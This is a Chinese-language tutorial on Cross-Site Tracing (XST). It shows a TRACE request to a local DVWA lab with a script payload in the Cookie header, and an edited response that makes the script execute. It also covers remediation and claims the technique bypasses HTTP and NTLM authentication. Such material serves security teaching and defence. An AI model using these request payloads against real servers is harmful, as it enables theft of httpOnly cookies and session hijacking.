漏洞简介

XST 的全称是 Cross-Site Tracing，中文译作“跨站式追踪攻击”。具体而言，是客户端发 TRACE / TRACK 请求至服务器，如果服务器按照标准实现了 TRACE / TRACK 响应，则在 response body 里会返回此次请求的完整头信息。通过这种方式，客户端可以获取某些敏感的 header 字段，例如 httpOnly 的 Cookie 等。

攻击条件

1、需要目标 Web 服务器允许接受 Trace、Track 方法的请求；
2、客户端可以发送 Trace、Track 方法的请求。

攻击方法

1、首先通过抓包工具拦截请求，修改请求包中的请求方法和请求包中的任意一个字段，下面以Cookie字段为例，在Cookie中插入XSS代码：

TRACE /DVWA/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: <script>alert("TRACE XSS")</script>
Upgrade-Insecure-Requests: 1

2、修改响应包中的Content-Type:message/http，改为Content-Type:text/html：

HTTP/1.1 200 OK
Date: Sun, 12 Nov 2023 13:28:02 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Content-Type: text/html
Content-Length: 401

TRACE /DVWA/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: <script>alert("TRACE XSS")</script>
Upgrade-Insecure-Requests: 1

发送请求后页面就会弹窗​，如下图：

修复方式

杜绝 XST 非常简单，Web 服务器限制 Trace、Track 方法的请求即可。另如今， XMLHTTPRequest 已经杜绝了 Trace 与 Track 方法的请求（Chrome 25 版本及 FireFox 19 之后），如果尝试用 Trace / Track 方法请求，会抛出 SecurityError 异常，这也从根本上杜绝了 XST 攻击。
同时，在 FireFox 43 之后，Cookie 等不安全字段也被禁止携带在请求的 header 中发送
虽说目前现代浏览器已经越来越安全，XST 也成为了历史，但其给我们 web 开发者也留下警示——代码编写时一定要注意安全性和严谨性。

优势

XST和XSS的​相同点：都具有很大的欺骗性，可以对受害主机产生危害，而且这种攻击是多平台多技术的，我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
XST的优点：可以绕过一般的http验证以及NTLM验证。